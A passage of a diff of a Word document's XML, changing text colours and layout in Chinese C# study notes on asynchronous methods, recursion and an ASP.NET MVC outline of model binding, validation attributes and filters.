           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8742,7 +8958,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8872,27 +9088,35 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="1350"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="00B050"/>
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
+          <w:color w:val="00B050"/>
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>基于事件的异步方法优势在于易于使用。但是，在自定义类中这个模式就没有这么简单了</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
+        <w:lastRenderedPageBreak/>
+        <w:t>基于事件的异步方法优势在于易于使用。但是，在自定义类中这个模式就没有这么简单了。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2160"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:color w:val="00B050"/>
           <w:sz w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>。</w:t>
-      </w:r>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8902,10 +9126,12 @@
           <w:numId w:val="16"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1350"/>
+        <w:ind w:left="1349" w:hanging="357"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
@@ -8914,7 +9140,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8925,7 +9151,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -8936,7 +9162,7 @@
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="333333"/>
+          <w:color w:val="0070C0"/>
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -9038,7 +9264,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>string</w:t>
       </w:r>
       <w:r>
@@ -9770,7 +9995,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:color w:val="00B050"/>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
@@ -9803,6 +10028,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>概念</w:t>
       </w:r>
       <w:r>
@@ -9976,14 +10202,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>递归，说白了就是直接或者间接的调用自己的一种算法。它是把求解问题转化为规模较小的子问题，然后通过多次递归一直到可以得出结果的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>最小解，然后通过最小解逐层向上返回调用，最终得到整个问题的解。总之递归可以概括为一句话就是：</w:t>
+        <w:t>递归，说白了就是直接或者间接的调用自己的一种算法。它是把求解问题转化为规模较小的子问题，然后通过多次递归一直到可以得出结果的最小解，然后通过最小解逐层向上返回调用，最终得到整个问题的解。总之递归可以概括为一句话就是：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10596,1196 +10815,9 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:t>ASP.NET Mvc框架</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="02696D"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Routing</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>路由</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="02696D"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Binding</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>模型绑定</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>new ChildActionValueProviderFactory(),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>new FormValueProviderFactory(),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>new JsonValueProviderFactory(),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>new RouteDataValueProviderFactory(),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>new QueryStringValueProviderFactory(),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>new HttpFileCollectionValueProviderFactory()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="18"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="02696D"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>AOP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>面向切面（常用特性</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>(Attribute)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="02696D"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>及自定义特性）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="20"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>元数据</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="20"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>验证基类</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.ValidationAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.CompareAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.CustomValidationAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.DataTypeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.MaxLengthAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.MinLengthAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.RangeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.RegularExpressionAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.RequiredAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.ComponentModel.DataAnnotations.StringLengthAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>System.Web.Security.MembershipPasswordAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="20"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="20"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Filter</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>IAuthenticationFilter(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>验证过滤器</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> MVC5)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>验证是否合理请求，是否合理用户</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>IAuthorizationFilter(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>授权过滤器</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>RequireHttpsAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ChildActionOnlyAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
